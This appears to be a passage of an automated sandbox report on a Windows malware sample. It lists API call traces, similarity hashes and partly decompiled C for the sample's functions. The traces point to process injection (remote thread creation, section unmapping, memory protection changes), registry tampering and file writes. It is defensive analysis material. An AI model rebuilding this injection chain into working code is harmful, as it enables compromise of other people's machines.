InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

